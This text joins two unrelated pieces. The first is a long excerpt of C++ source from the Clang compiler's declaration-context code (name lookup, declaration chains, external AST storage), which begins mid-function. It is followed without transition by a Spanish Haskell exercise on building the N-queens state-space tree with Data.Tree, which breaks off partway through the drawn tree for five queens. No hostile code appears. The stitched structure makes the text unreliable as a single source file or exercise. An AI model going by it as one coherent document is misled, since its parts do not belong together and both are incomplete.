#ifndef NDEBUG
// Suppress this check if any of the following hold:
// 1. this is the translation unit (and thus has no parent)
// 2. this is a template parameter (and thus doesn't belong to its context)
// 3. this is a non-type template parameter
// 4. the context is not a record
// 5. it's invalid
// 6. it's a C++0x static_assert.
if (isa<TranslationUnitDecl>(this) ||
isa<TemplateTypeParmDecl>(this) ||
isa<NonTypeTemplateParmDecl>(this) ||
!isa<CXXRecordDecl>(getDeclContext()) ||
isInvalidDecl() ||
isa<StaticAssertDecl>(this) ||
// FIXME: a ParmVarDecl can have ClassTemplateSpecialization
// as DeclContext (?).
isa<ParmVarDecl>(this) ||
// FIXME: a ClassTemplateSpecialization or CXXRecordDecl can have
// AS_none as access specifier.
isa<CXXRecordDecl>(this) ||
isa<ClassScopeFunctionSpecializationDecl>(this))
return true;
assert(Access != AS_none &&
"Access specifier is AS_none inside a record decl");
#endif
return true;
}
static Decl::Kind getKind(const Decl *D) { return D->getKind(); }
static Decl::Kind getKind(const DeclContext *DC) { return DC->getDeclKind(); }
const FunctionType *Decl::getFunctionType(bool BlocksToo) const {
QualType Ty;
if (const ValueDecl *D = dyn_cast<ValueDecl>(this))
Ty = D->getType();
else if (const TypedefNameDecl *D = dyn_cast<TypedefNameDecl>(this))
Ty = D->getUnderlyingType();
else
return nullptr;
if (Ty->isFunctionPointerType())
Ty = Ty->getAs<PointerType>()->getPointeeType();
else if (BlocksToo && Ty->isBlockPointerType())
Ty = Ty->getAs<BlockPointerType>()->getPointeeType();
return Ty->getAs<FunctionType>();
}
/// Starting at a given context (a Decl or DeclContext), look for a
/// code context that is not a closure (a lambda, block, etc.).
template <class T> static Decl *getNonClosureContext(T *D) {
if (getKind(D) == Decl::CXXMethod) {
CXXMethodDecl *MD = cast<CXXMethodDecl>(D);
if (MD->getOverloadedOperator() == OO_Call &&
MD->getParent()->isLambda())
return getNonClosureContext(MD->getParent()->getParent());
return MD;
} else if (FunctionDecl *FD = dyn_cast<FunctionDecl>(D)) {
return FD;
} else if (ObjCMethodDecl *MD = dyn_cast<ObjCMethodDecl>(D)) {
return MD;
} else if (BlockDecl *BD = dyn_cast<BlockDecl>(D)) {
return getNonClosureContext(BD->getParent());
} else if (CapturedDecl *CD = dyn_cast<CapturedDecl>(D)) {
return getNonClosureContext(CD->getParent());
} else {
return nullptr;
}
}
Decl *Decl::getNonClosureContext() {
return ::getNonClosureContext(this);
}
Decl *DeclContext::getNonClosureAncestor() {
return ::getNonClosureContext(this);
}
//===----------------------------------------------------------------------===//
// DeclContext Implementation
//===----------------------------------------------------------------------===//
bool DeclContext::classof(const Decl *D) {
switch (D->getKind()) {
#define DECL(NAME, BASE)
#define DECL_CONTEXT(NAME) case Decl::NAME:
#define DECL_CONTEXT_BASE(NAME)
#include "clang/AST/DeclNodes.inc"
return true;
default:
#define DECL(NAME, BASE)
#define DECL_CONTEXT_BASE(NAME) \
if (D->getKind() >= Decl::first##NAME && \
D->getKind() <= Decl::last##NAME) \
return true;
#include "clang/AST/DeclNodes.inc"
return false;
}
}
DeclContext::~DeclContext() { }
/// \brief Find the parent context of this context that will be
/// used for unqualified name lookup.
///
/// Generally, the parent lookup context is the semantic context. However, for
/// a friend function the parent lookup context is the lexical context, which
/// is the class in which the friend is declared.
DeclContext *DeclContext::getLookupParent() {
// FIXME: Find a better way to identify friends
if (isa<FunctionDecl>(this))
if (getParent()->getRedeclContext()->isFileContext() &&
getLexicalParent()->getRedeclContext()->isRecord())
return getLexicalParent();
return getParent();
}
bool DeclContext::isInlineNamespace() const {
return isNamespace() &&
cast<NamespaceDecl>(this)->isInline();
}
bool DeclContext::isStdNamespace() const {
if (!isNamespace())
return false;
const NamespaceDecl *ND = cast<NamespaceDecl>(this);
if (ND->isInline()) {
return ND->getParent()->isStdNamespace();
}
if (!getParent()->getRedeclContext()->isTranslationUnit())
return false;
const IdentifierInfo *II = ND->getIdentifier();
return II && II->isStr("std");
}
bool DeclContext::isDependentContext() const {
if (isFileContext())
return false;
if (isa<ClassTemplatePartialSpecializationDecl>(this))
return true;
if (const CXXRecordDecl *Record = dyn_cast<CXXRecordDecl>(this)) {
if (Record->getDescribedClassTemplate())
return true;
if (Record->isDependentLambda())
return true;
}
if (const FunctionDecl *Function = dyn_cast<FunctionDecl>(this)) {
if (Function->getDescribedFunctionTemplate())
return true;
// Friend function declarations are dependent if their *lexical*
// context is dependent.
if (cast<Decl>(this)->getFriendObjectKind())
return getLexicalParent()->isDependentContext();
}
// FIXME: A variable template is a dependent context, but is not a
// DeclContext. A context within it (such as a lambda-expression)
// should be considered dependent.
return getParent() && getParent()->isDependentContext();
}
bool DeclContext::isTransparentContext() const {
if (DeclKind == Decl::Enum)
return !cast<EnumDecl>(this)->isScoped();
else if (DeclKind == Decl::LinkageSpec)
return true;
return false;
}
static bool isLinkageSpecContext(const DeclContext *DC,
LinkageSpecDecl::LanguageIDs ID) {
while (DC->getDeclKind() != Decl::TranslationUnit) {
if (DC->getDeclKind() == Decl::LinkageSpec)
return cast<LinkageSpecDecl>(DC)->getLanguage() == ID;
DC = DC->getLexicalParent();
}
return false;
}
bool DeclContext::isExternCContext() const {
return isLinkageSpecContext(this, clang::LinkageSpecDecl::lang_c);
}
const LinkageSpecDecl *DeclContext::getExternCContext() const {
const DeclContext *DC = this;
while (DC->getDeclKind() != Decl::TranslationUnit) {
if (DC->getDeclKind() == Decl::LinkageSpec &&
cast<LinkageSpecDecl>(DC)->getLanguage() ==
clang::LinkageSpecDecl::lang_c)
return cast<LinkageSpecDecl>(DC);
DC = DC->getLexicalParent();
}
return nullptr;
}
bool DeclContext::isExternCXXContext() const {
return isLinkageSpecContext(this, clang::LinkageSpecDecl::lang_cxx);
}
bool DeclContext::Encloses(const DeclContext *DC) const {
if (getPrimaryContext() != this)
return getPrimaryContext()->Encloses(DC);
for (; DC; DC = DC->getParent())
if (DC->getPrimaryContext() == this)
return true;
return false;
}
DeclContext *DeclContext::getPrimaryContext() {
switch (DeclKind) {
case Decl::TranslationUnit:
case Decl::ExternCContext:
case Decl::LinkageSpec:
case Decl::Block:
case Decl::Captured:
case Decl::OMPDeclareReduction:
// There is only one DeclContext for these entities.
return this;
case Decl::Namespace:
// The original namespace is our primary context.
return static_cast<NamespaceDecl*>(this)->getOriginalNamespace();
case Decl::ObjCMethod:
return this;
case Decl::ObjCInterface:
if (ObjCInterfaceDecl *Def = cast<ObjCInterfaceDecl>(this)->getDefinition())
return Def;
return this;
case Decl::ObjCProtocol:
if (ObjCProtocolDecl *Def = cast<ObjCProtocolDecl>(this)->getDefinition())
return Def;
return this;
case Decl::ObjCCategory:
return this;
case Decl::ObjCImplementation:
case Decl::ObjCCategoryImpl:
return this;
default:
if (DeclKind >= Decl::firstTag && DeclKind <= Decl::lastTag) {
// If this is a tag type that has a definition or is currently
// being defined, that definition is our primary context.
TagDecl *Tag = cast<TagDecl>(this);
if (TagDecl *Def = Tag->getDefinition())
return Def;
if (const TagType *TagTy = dyn_cast<TagType>(Tag->getTypeForDecl())) {
// Note, TagType::getDecl returns the (partial) definition one exists.
TagDecl *PossiblePartialDef = TagTy->getDecl();
if (PossiblePartialDef->isBeingDefined())
return PossiblePartialDef;
} else {
assert(isa<InjectedClassNameType>(Tag->getTypeForDecl()));
}
return Tag;
}
assert(DeclKind >= Decl::firstFunction && DeclKind <= Decl::lastFunction &&
"Unknown DeclContext kind");
return this;
}
}
void
DeclContext::collectAllContexts(SmallVectorImpl<DeclContext *> &Contexts){
Contexts.clear();
if (DeclKind != Decl::Namespace) {
Contexts.push_back(this);
return;
}
NamespaceDecl *Self = static_cast<NamespaceDecl *>(this);
for (NamespaceDecl *N = Self->getMostRecentDecl(); N;
N = N->getPreviousDecl())
Contexts.push_back(N);
std::reverse(Contexts.begin(), Contexts.end());
}
std::pair<Decl *, Decl *>
DeclContext::BuildDeclChain(ArrayRef<Decl*> Decls,
bool FieldsAlreadyLoaded) {
// Build up a chain of declarations via the Decl::NextInContextAndBits field.
Decl *FirstNewDecl = nullptr;
Decl *PrevDecl = nullptr;
for (unsigned I = 0, N = Decls.size(); I != N; ++I) {
if (FieldsAlreadyLoaded && isa<FieldDecl>(Decls[I]))
continue;
Decl *D = Decls[I];
if (PrevDecl)
PrevDecl->NextInContextAndBits.setPointer(D);
else
FirstNewDecl = D;
PrevDecl = D;
}
return std::make_pair(FirstNewDecl, PrevDecl);
}
/// \brief We have just acquired external visible storage, and we already have
/// built a lookup map. For every name in the map, pull in the new names from
/// the external storage.
void DeclContext::reconcileExternalVisibleStorage() const {
assert(NeedToReconcileExternalVisibleStorage && LookupPtr);
NeedToReconcileExternalVisibleStorage = false;
for (auto &Lookup : *LookupPtr)
Lookup.second.setHasExternalDecls();
}
/// \brief Load the declarations within this lexical storage from an
/// external source.
/// \return \c true if any declarations were added.
bool
DeclContext::LoadLexicalDeclsFromExternalStorage() const {
ExternalASTSource *Source = getParentASTContext().getExternalSource();
assert(hasExternalLexicalStorage() && Source && "No external storage?");
// Notify that we have a DeclContext that is initializing.
ExternalASTSource::Deserializing ADeclContext(Source);
// Load the external declarations, if any.
SmallVector<Decl*, 64> Decls;
ExternalLexicalStorage = false;
Source->FindExternalLexicalDecls(this, Decls);
if (Decls.empty())
return false;
// We may have already loaded just the fields of this record, in which case
// we need to ignore them.
bool FieldsAlreadyLoaded = false;
if (const RecordDecl *RD = dyn_cast<RecordDecl>(this))
FieldsAlreadyLoaded = RD->LoadedFieldsFromExternalStorage;
// Splice the newly-read declarations into the beginning of the list
// of declarations.
Decl *ExternalFirst, *ExternalLast;
std::tie(ExternalFirst, ExternalLast) =
BuildDeclChain(Decls, FieldsAlreadyLoaded);
ExternalLast->NextInContextAndBits.setPointer(FirstDecl);
FirstDecl = ExternalFirst;
if (!LastDecl)
LastDecl = ExternalLast;
return true;
}
DeclContext::lookup_result
ExternalASTSource::SetNoExternalVisibleDeclsForName(const DeclContext *DC,
DeclarationName Name) {
ASTContext &Context = DC->getParentASTContext();
StoredDeclsMap *Map;
if (!(Map = DC->LookupPtr))
Map = DC->CreateStoredDeclsMap(Context);
if (DC->NeedToReconcileExternalVisibleStorage)
DC->reconcileExternalVisibleStorage();
(*Map)[Name].removeExternalDecls();
return DeclContext::lookup_result();
}
DeclContext::lookup_result
ExternalASTSource::SetExternalVisibleDeclsForName(const DeclContext *DC,
DeclarationName Name,
ArrayRef<NamedDecl*> Decls) {
ASTContext &Context = DC->getParentASTContext();
StoredDeclsMap *Map;
if (!(Map = DC->LookupPtr))
Map = DC->CreateStoredDeclsMap(Context);
if (DC->NeedToReconcileExternalVisibleStorage)
DC->reconcileExternalVisibleStorage();
StoredDeclsList &List = (*Map)[Name];
// Clear out any old external visible declarations, to avoid quadratic
// performance in the redeclaration checks below.
List.removeExternalDecls();
if (!List.isNull()) {
// We have both existing declarations and new declarations for this name.
// Some of the declarations may simply replace existing ones. Handle those
// first.
llvm::SmallVector<unsigned, 8> Skip;
for (unsigned I = 0, N = Decls.size(); I != N; ++I)
if (List.HandleRedeclaration(Decls[I], /*IsKnownNewer*/false))
Skip.push_back(I);
Skip.push_back(Decls.size());
// Add in any new declarations.
unsigned SkipPos = 0;
for (unsigned I = 0, N = Decls.size(); I != N; ++I) {
if (I == Skip[SkipPos])
++SkipPos;
else
List.AddSubsequentDecl(Decls[I]);
}
} else {
// Convert the array to a StoredDeclsList.
for (ArrayRef<NamedDecl*>::iterator
I = Decls.begin(), E = Decls.end(); I != E; ++I) {
if (List.isNull())
List.setOnlyValue(*I);
else
List.AddSubsequentDecl(*I);
}
}
return List.getLookupResult();
}
DeclContext::decl_iterator DeclContext::decls_begin() const {
if (hasExternalLexicalStorage())
LoadLexicalDeclsFromExternalStorage();
return decl_iterator(FirstDecl);
}
bool DeclContext::decls_empty() const {
if (hasExternalLexicalStorage())
LoadLexicalDeclsFromExternalStorage();
return !FirstDecl;
}
bool DeclContext::containsDecl(Decl *D) const {
return (D->getLexicalDeclContext() == this &&
(D->NextInContextAndBits.getPointer() || D == LastDecl));
}
void DeclContext::removeDecl(Decl *D) {
assert(D->getLexicalDeclContext() == this &&
"decl being removed from non-lexical context");
assert((D->NextInContextAndBits.getPointer() || D == LastDecl) &&
"decl is not in decls list");
// Remove D from the decl chain. This is O(n) but hopefully rare.
if (D == FirstDecl) {
if (D == LastDecl)
FirstDecl = LastDecl = nullptr;
else
FirstDecl = D->NextInContextAndBits.getPointer();
} else {
for (Decl *I = FirstDecl; true; I = I->NextInContextAndBits.getPointer()) {
assert(I && "decl not found in linked list");
if (I->NextInContextAndBits.getPointer() == D) {
I->NextInContextAndBits.setPointer(D->NextInContextAndBits.getPointer());
if (D == LastDecl) LastDecl = I;
break;
}
}
}
// Mark that D is no longer in the decl chain.
D->NextInContextAndBits.setPointer(nullptr);
// Remove D from the lookup table if necessary.
if (isa<NamedDecl>(D)) {
NamedDecl *ND = cast<NamedDecl>(D);
// Remove only decls that have a name
if (!ND->getDeclName()) return;
auto *DC = this;
do {
StoredDeclsMap *Map = DC->getPrimaryContext()->LookupPtr;
if (Map) {
StoredDeclsMap::iterator Pos = Map->find(ND->getDeclName());
assert(Pos != Map->end() && "no lookup entry for decl");
if (Pos->second.getAsVector() || Pos->second.getAsDecl() == ND)
Pos->second.remove(ND);
}
} while (DC->isTransparentContext() && (DC = DC->getParent()));
}
}
void DeclContext::addHiddenDecl(Decl *D) {
assert(D->getLexicalDeclContext() == this &&
"Decl inserted into wrong lexical context");
assert(!D->getNextDeclInContext() && D != LastDecl &&
"Decl already inserted into a DeclContext");
if (FirstDecl) {
LastDecl->NextInContextAndBits.setPointer(D);
LastDecl = D;
} else {
FirstDecl = LastDecl = D;
}
// Notify a C++ record declaration that we've added a member, so it can
// update its class-specific state.
if (CXXRecordDecl *Record = dyn_cast<CXXRecordDecl>(this))
Record->addedMember(D);
// If this is a newly-created (not de-serialized) import declaration, wire
// it in to the list of local import declarations.
if (!D->isFromASTFile()) {
if (ImportDecl *Import = dyn_cast<ImportDecl>(D))
D->getASTContext().addedLocalImportDecl(Import);
}
}
void DeclContext::addDecl(Decl *D) {
addHiddenDecl(D);
if (NamedDecl *ND = dyn_cast<NamedDecl>(D))
ND->getDeclContext()->getPrimaryContext()->
makeDeclVisibleInContextWithFlags(ND, false, true);
}
void DeclContext::addDeclInternal(Decl *D) {
addHiddenDecl(D);
if (NamedDecl *ND = dyn_cast<NamedDecl>(D))
ND->getDeclContext()->getPrimaryContext()->
makeDeclVisibleInContextWithFlags(ND, true, true);
}
/// shouldBeHidden - Determine whether a declaration which was declared
/// within its semantic context should be invisible to qualified name lookup.
static bool shouldBeHidden(NamedDecl *D) {
// Skip unnamed declarations.
if (!D->getDeclName())
return true;
// Skip entities that can't be found by name lookup into a particular
// context.
if ((D->getIdentifierNamespace() == 0 && !isa<UsingDirectiveDecl>(D)) ||
D->isTemplateParameter())
return true;
// Skip template specializations.
// FIXME: This feels like a hack. Should DeclarationName support
// template-ids, or is there a better way to keep specializations
// from being visible?
if (isa<ClassTemplateSpecializationDecl>(D))
return true;
if (FunctionDecl *FD = dyn_cast<FunctionDecl>(D))
if (FD->isFunctionTemplateSpecialization())
return true;
return false;
}
/// buildLookup - Build the lookup data structure with all of the
/// declarations in this DeclContext (and any other contexts linked
/// to it or transparent contexts nested within it) and return it.
///
/// Note that the produced map may miss out declarations from an
/// external source. If it does, those entries will be marked with
/// the 'hasExternalDecls' flag.
StoredDeclsMap *DeclContext::buildLookup() {
assert(this == getPrimaryContext() && "buildLookup called on non-primary DC");
if (!HasLazyLocalLexicalLookups && !HasLazyExternalLexicalLookups)
return LookupPtr;
SmallVector<DeclContext *, 2> Contexts;
collectAllContexts(Contexts);
if (HasLazyExternalLexicalLookups) {
HasLazyExternalLexicalLookups = false;
for (auto *DC : Contexts) {
if (DC->hasExternalLexicalStorage())
HasLazyLocalLexicalLookups |=
DC->LoadLexicalDeclsFromExternalStorage();
}
if (!HasLazyLocalLexicalLookups)
return LookupPtr;
}
for (auto *DC : Contexts)
buildLookupImpl(DC, hasExternalVisibleStorage());
// We no longer have any lazy decls.
HasLazyLocalLexicalLookups = false;
return LookupPtr;
}
/// buildLookupImpl - Build part of the lookup data structure for the
/// declarations contained within DCtx, which will either be this
/// DeclContext, a DeclContext linked to it, or a transparent context
/// nested within it.
void DeclContext::buildLookupImpl(DeclContext *DCtx, bool Internal) {
for (Decl *D : DCtx->noload_decls()) {
// Insert this declaration into the lookup structure, but only if
// it's semantically within its decl context. Any other decls which
// should be found in this context are added eagerly.
//
// If it's from an AST file, don't add it now. It'll get handled by
// FindExternalVisibleDeclsByName if needed. Exception: if we're not
// in C++, we do not track external visible decls for the TU, so in
// that case we need to collect them all here.
if (NamedDecl *ND = dyn_cast<NamedDecl>(D))
if (ND->getDeclContext() == DCtx && !shouldBeHidden(ND) &&
(!ND->isFromASTFile() ||
(isTranslationUnit() &&
!getParentASTContext().getLangOpts().CPlusPlus)))
makeDeclVisibleInContextImpl(ND, Internal);
// If this declaration is itself a transparent declaration context
// or inline namespace, add the members of this declaration of that
// context (recursively).
if (DeclContext *InnerCtx = dyn_cast<DeclContext>(D))
if (InnerCtx->isTransparentContext() || InnerCtx->isInlineNamespace())
buildLookupImpl(InnerCtx, Internal);
}
}
NamedDecl *const DeclContextLookupResult::SingleElementDummyList = nullptr;
DeclContext::lookup_result
DeclContext::lookup(DeclarationName Name) const {
assert(DeclKind != Decl::LinkageSpec &&
"Should not perform lookups into linkage specs!");
const DeclContext *PrimaryContext = getPrimaryContext();
if (PrimaryContext != this)
return PrimaryContext->lookup(Name);
// If we have an external source, ensure that any later redeclarations of this
// context have been loaded, since they may add names to the result of this
// lookup (or add external visible storage).
ExternalASTSource *Source = getParentASTContext().getExternalSource();
if (Source)
(void)cast<Decl>(this)->getMostRecentDecl();
if (hasExternalVisibleStorage()) {
assert(Source && "external visible storage but no external source?");
if (NeedToReconcileExternalVisibleStorage)
reconcileExternalVisibleStorage();
StoredDeclsMap *Map = LookupPtr;
if (HasLazyLocalLexicalLookups || HasLazyExternalLexicalLookups)
// FIXME: Make buildLookup const?
Map = const_cast<DeclContext*>(this)->buildLookup();
if (!Map)
Map = CreateStoredDeclsMap(getParentASTContext());
// If we have a lookup result with no external decls, we are done.
std::pair<StoredDeclsMap::iterator, bool> R =
Map->insert(std::make_pair(Name, StoredDeclsList()));
if (!R.second && !R.first->second.hasExternalDecls())
return R.first->second.getLookupResult();
if (Source->FindExternalVisibleDeclsByName(this, Name) || !R.second) {
if (StoredDeclsMap *Map = LookupPtr) {
StoredDeclsMap::iterator I = Map->find(Name);
if (I != Map->end())
return I->second.getLookupResult();
}
}
return lookup_result();
}
StoredDeclsMap *Map = LookupPtr;
if (HasLazyLocalLexicalLookups || HasLazyExternalLexicalLookups)
Map = const_cast<DeclContext*>(this)->buildLookup();
if (!Map)
return lookup_result();
StoredDeclsMap::iterator I = Map->find(Name);
if (I == Map->end())
return lookup_result();
return I->second.getLookupResult();
}
DeclContext::lookup_result
DeclContext::noload_lookup(DeclarationName Name) {
assert(DeclKind != Decl::LinkageSpec &&
"Should not perform lookups into linkage specs!");
DeclContext *PrimaryContext = getPrimaryContext();
if (PrimaryContext != this)
return PrimaryContext->noload_lookup(Name);
// If we have any lazy lexical declarations not in our lookup map, add them
// now. Don't import any external declarations, not even if we know we have
// some missing from the external visible lookups.
if (HasLazyLocalLexicalLookups) {
SmallVector<DeclContext *, 2> Contexts;
collectAllContexts(Contexts);
for (unsigned I = 0, N = Contexts.size(); I != N; ++I)
buildLookupImpl(Contexts[I], hasExternalVisibleStorage());
HasLazyLocalLexicalLookups = false;
}
StoredDeclsMap *Map = LookupPtr;
if (!Map)
return lookup_result();
StoredDeclsMap::iterator I = Map->find(Name);
return I != Map->end() ? I->second.getLookupResult()
: lookup_result();
}
void DeclContext::localUncachedLookup(DeclarationName Name,
SmallVectorImpl<NamedDecl *> &Results) {
Results.clear();
// If there's no external storage, just perform a normal lookup and copy
// the results.
if (!hasExternalVisibleStorage() && !hasExternalLexicalStorage() && Name) {
lookup_result LookupResults = lookup(Name);
Results.insert(Results.end(), LookupResults.begin(), LookupResults.end());
return;
}
// If we have a lookup table, check there first. Maybe we'll get lucky.
// FIXME: Should we be checking these flags on the primary context?
if (Name && !HasLazyLocalLexicalLookups && !HasLazyExternalLexicalLookups) {
if (StoredDeclsMap *Map = LookupPtr) {
StoredDeclsMap::iterator Pos = Map->find(Name);
if (Pos != Map->end()) {
Results.insert(Results.end(),
Pos->second.getLookupResult().begin(),
Pos->second.getLookupResult().end());
return;
}
}
}
// Slow case: grovel through the declarations in our chain looking for
// matches.
// FIXME: If we have lazy external declarations, this will not find them!
// FIXME: Should we CollectAllContexts and walk them all here?
for (Decl *D = FirstDecl; D; D = D->getNextDeclInContext()) {
if (NamedDecl *ND = dyn_cast<NamedDecl>(D))
if (ND->getDeclName() == Name)
Results.push_back(ND);
}
}
DeclContext *DeclContext::getRedeclContext() {
DeclContext *Ctx = this;
// Skip through transparent contexts.
while (Ctx->isTransparentContext())
Ctx = Ctx->getParent();
return Ctx;
}
DeclContext *DeclContext::getEnclosingNamespaceContext() {
DeclContext *Ctx = this;
// Skip through non-namespace, non-translation-unit contexts.
while (!Ctx->isFileContext())
Ctx = Ctx->getParent();
return Ctx->getPrimaryContext();
}
RecordDecl *DeclContext::getOuterLexicalRecordContext() {
// Loop until we find a non-record context.
RecordDecl *OutermostRD = nullptr;
DeclContext *DC = this;
while (DC->isRecord()) {
OutermostRD = cast<RecordDecl>(DC);
DC = DC->getLexicalParent();
}
return OutermostRD;
}
bool DeclContext::InEnclosingNamespaceSetOf(const DeclContext *O) const {
// For non-file contexts, this is equivalent to Equals.
if (!isFileContext())
return O->Equals(this);
do {
if (O->Equals(this))
return true;
const NamespaceDecl *NS = dyn_cast<NamespaceDecl>(O);
if (!NS || !NS->isInline())
break;
O = NS->getParent();
} while (O);
return false;
}
void DeclContext::makeDeclVisibleInContext(NamedDecl *D) {
DeclContext *PrimaryDC = this->getPrimaryContext();
DeclContext *DeclDC = D->getDeclContext()->getPrimaryContext();
// If the decl is being added outside of its semantic decl context, we
// need to ensure that we eagerly build the lookup information for it.
PrimaryDC->makeDeclVisibleInContextWithFlags(D, false, PrimaryDC == DeclDC);
}
void DeclContext::makeDeclVisibleInContextWithFlags(NamedDecl *D, bool Internal,
bool Recoverable) {
assert(this == getPrimaryContext() && "expected a primary DC");
if (!isLookupContext()) {
if (isTransparentContext())
getParent()->getPrimaryContext()
->makeDeclVisibleInContextWithFlags(D, Internal, Recoverable);
return;
}
// Skip declarations which should be invisible to name lookup.
if (shouldBeHidden(D))
return;
// If we already have a lookup data structure, perform the insertion into
// it. If we might have externally-stored decls with this name, look them
// up and perform the insertion. If this decl was declared outside its
// semantic context, buildLookup won't add it, so add it now.
//
// FIXME: As a performance hack, don't add such decls into the translation
// unit unless we're in C++, since qualified lookup into the TU is never
// performed.
if (LookupPtr || hasExternalVisibleStorage() ||
((!Recoverable || D->getDeclContext() != D->getLexicalDeclContext()) &&
(getParentASTContext().getLangOpts().CPlusPlus ||
!isTranslationUnit()))) {
// If we have lazily omitted any decls, they might have the same name as
// the decl which we are adding, so build a full lookup table before adding
// this decl.
buildLookup();
makeDeclVisibleInContextImpl(D, Internal);
} else {
HasLazyLocalLexicalLookups = true;
}
// If we are a transparent context or inline namespace, insert into our
// parent context, too. This operation is recursive.
if (isTransparentContext() || isInlineNamespace())
getParent()->getPrimaryContext()->
makeDeclVisibleInContextWithFlags(D, Internal, Recoverable);
Decl *DCAsDecl = cast<Decl>(this);
// Notify that a decl was made visible unless we are a Tag being defined.
if (!(isa<TagDecl>(DCAsDecl) && cast<TagDecl>(DCAsDecl)->isBeingDefined()))
if (ASTMutationListener *L = DCAsDecl->getASTMutationListener())
L->AddedVisibleDecl(this, D);
}
void DeclContext::makeDeclVisibleInContextImpl(NamedDecl *D, bool Internal) {
// Find or create the stored declaration map.
StoredDeclsMap *Map = LookupPtr;
if (!Map) {
ASTContext *C = &getParentASTContext();
Map = CreateStoredDeclsMap(*C);
}
// If there is an external AST source, load any declarations it knows about
// with this declaration's name.
// If the lookup table contains an entry about this name it means that we
// have already checked the external source.
if (!Internal)
if (ExternalASTSource *Source = getParentASTContext().getExternalSource())
if (hasExternalVisibleStorage() &&
Map->find(D->getDeclName()) == Map->end())
Source->FindExternalVisibleDeclsByName(this, D->getDeclName());
// Insert this declaration into the map.
StoredDeclsList &DeclNameEntries = (*Map)[D->getDeclName()];
if (Internal) {
// If this is being added as part of loading an external declaration,
// this may not be the only external declaration with this name.
// In this case, we never try to replace an existing declaration; we'll
// handle that when we finalize the list of declarations for this name.
DeclNameEntries.setHasExternalDecls();
DeclNameEntries.AddSubsequentDecl(D);
return;
}
if (DeclNameEntries.isNull()) {
DeclNameEntries.setOnlyValue(D);
return;
}
if (DeclNameEntries.HandleRedeclaration(D, /*IsKnownNewer*/!Internal)) {
// This declaration has replaced an existing one for which
// declarationReplaces returns true.
return;
}
// Put this declaration into the appropriate slot.
DeclNameEntries.AddSubsequentDecl(D);
}
UsingDirectiveDecl *DeclContext::udir_iterator::operator*() const {
return cast<UsingDirectiveDecl>(*I);
}
/// Returns iterator range [First, Last) of UsingDirectiveDecls stored within
/// this context.
DeclContext::udir_range DeclContext::using_directives() const {
// FIXME: Use something more efficient than normal lookup for using
// directives. In C++, using directives are looked up more than anything else.
lookup_result Result = lookup(UsingDirectiveDecl::getName());
return udir_range(Result.begin(), Result.end());
}
//===----------------------------------------------------------------------===//
// Creation and Destruction of StoredDeclsMaps. //
//===----------------------------------------------------------------------===//
StoredDeclsMap *DeclContext::CreateStoredDeclsMap(ASTContext &C) const {
assert(!LookupPtr && "context already has a decls map");
assert(getPrimaryContext() == this &&
"creating decls map on non-primary context");
StoredDeclsMap *M;
bool Dependent = isDependentContext();
if (Dependent)
M = new DependentStoredDeclsMap();
else
M = new StoredDeclsMap();
M->Previous = C.LastSDM;
C.LastSDM = llvm::PointerIntPair<StoredDeclsMap*,1>(M, Dependent);
LookupPtr = M;
return M;
}
void ASTContext::ReleaseDeclContextMaps() {
// It's okay to delete DependentStoredDeclsMaps via a StoredDeclsMap
// pointer because the subclass doesn't add anything that needs to
// be deleted.
StoredDeclsMap::DestroyAll(LastSDM.getPointer(), LastSDM.getInt());
}
void StoredDeclsMap::DestroyAll(StoredDeclsMap *Map, bool Dependent) {
while (Map) {
// Advance the iteration before we invalidate memory.
llvm::PointerIntPair<StoredDeclsMap*,1> Next = Map->Previous;
if (Dependent)
delete static_cast<DependentStoredDeclsMap*>(Map);
else
delete Map;
Map = Next.getPointer();
Dependent = Next.getInt();
}
}
DependentDiagnostic *DependentDiagnostic::Create(ASTContext &C,
DeclContext *Parent,
const PartialDiagnostic &PDiag) {
assert(Parent->isDependentContext()
&& "cannot iterate dependent diagnostics of non-dependent context");
Parent = Parent->getPrimaryContext();
if (!Parent->LookupPtr)
Parent->CreateStoredDeclsMap(C);
DependentStoredDeclsMap *Map =
static_cast<DependentStoredDeclsMap *>(Parent->LookupPtr);
// Allocate the copy of the PartialDiagnostic via the ASTContext's
// BumpPtrAllocator, rather than the ASTContext itself.
PartialDiagnostic::Storage *DiagStorage = nullptr;
if (PDiag.hasStorage())
DiagStorage = new (C) PartialDiagnostic::Storage;
DependentDiagnostic *DD = new (C) DependentDiagnostic(PDiag, DiagStorage);
// TODO: Maybe we shouldn't reverse the order during insertion.
DD->NextDiagnostic = Map->FirstDiagnostic;
Map->FirstDiagnostic = DD;
return DD;
}
|
__label__pos
| 0.999613 |
Menu Close
Espacio de estados del problema de las N reinas
El problema de las N reinas consiste en colocar N reinas en tablero rectangular de dimensiones N por N de forma que no se encuentren más de una en la misma línea: horizontal, vertical o diagonal. Por ejemplo, una solución para el problema de las 4 reinas es
|---|---|---|---|
| | R | | |
|---|---|---|---|
| | | | R |
|---|---|---|---|
| R | | | |
|---|---|---|---|
| | | R | |
|---|---|---|---|
Los estados del problema de las N reinas son los tableros con las reinas colocadas. Inicialmente el tablero está vacío y, en cda paso se coloca una reina en la primera columna en la que aún no hay ninguna reina.
Cada estado se representa por una lista de números que indican las filas donde se han colocado las reinas. Por ejemplo, el tablero anterior se representa por [2,4,1,3].
Usando la librería de árboles Data.Tree, definir las funciones
arbolReinas :: Int -> Tree [Int]
nEstados :: Int -> Int
soluciones :: Int -> [[Int]]
nSoluciones :: Int -> Int
tales que
• (arbolReinas n) es el árbol de estados para el problema de las n reinas. Por ejemplo,
λ> putStrLn (drawTree (fmap show (arbolReinas 4)))
[]
|
+- [1]
| |
| +- [3,1]
| |
| `- [4,1]
| |
| `- [2,4,1]
|
+- [2]
| |
| `- [4,2]
| |
| `- [1,4,2]
| |
| `- [3,1,4,2]
|
+- [3]
| |
| `- [1,3]
| |
| `- [4,1,3]
| |
| `- [2,4,1,3]
|
`- [4]
|
+- [1,4]
| |
| `- [3,1,4]
|
`- [2,4]
λ> putStrLn (drawTree (fmap show (arbolReinas 5)))
[]
|
+- [1]
| |
| +- [3,1]
| | |
| | `- [5,3,1]
| | |
| | `- [2,5,3,1]
| | |
| | `- [4,2,5,3,1]
| |
| +- [4,1]
| | |
| | `- [2,4,1]
| | |
| | `- [5,2,4,1]
| | |
| | `- [3,5,2,4,1]
| |
| `- [5,1]
| |
| `- [2,5,1]
|
+- [2]
| |
| +- [4,2]
| | |
| | `- [1,4,2]
| | |
| | `- [3,1,4,2]
| | |
| | `- [5,3,1,4,2]
| |
| `- [5,2]
| |
| +- [1,5,2]
| | |
| | `- [4,1,5,2]
| |
| `- [3,5,2]
| |
| `- [1,3,5,2]
| |
| `- [4,1,3,5,2]
|
+- [3]
| |
| +- [1,3]
| | |
| | `- [4,1,3]
